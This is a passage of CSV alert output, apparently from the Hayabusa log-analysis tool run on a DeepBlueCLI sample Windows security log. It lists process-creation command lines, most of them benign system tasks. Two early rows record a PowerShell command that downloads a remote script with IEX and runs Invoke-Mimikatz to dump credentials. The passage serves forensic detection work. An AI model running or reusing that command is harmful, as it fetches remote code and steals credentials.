Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:54:31.771 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths 
@""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS 
Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 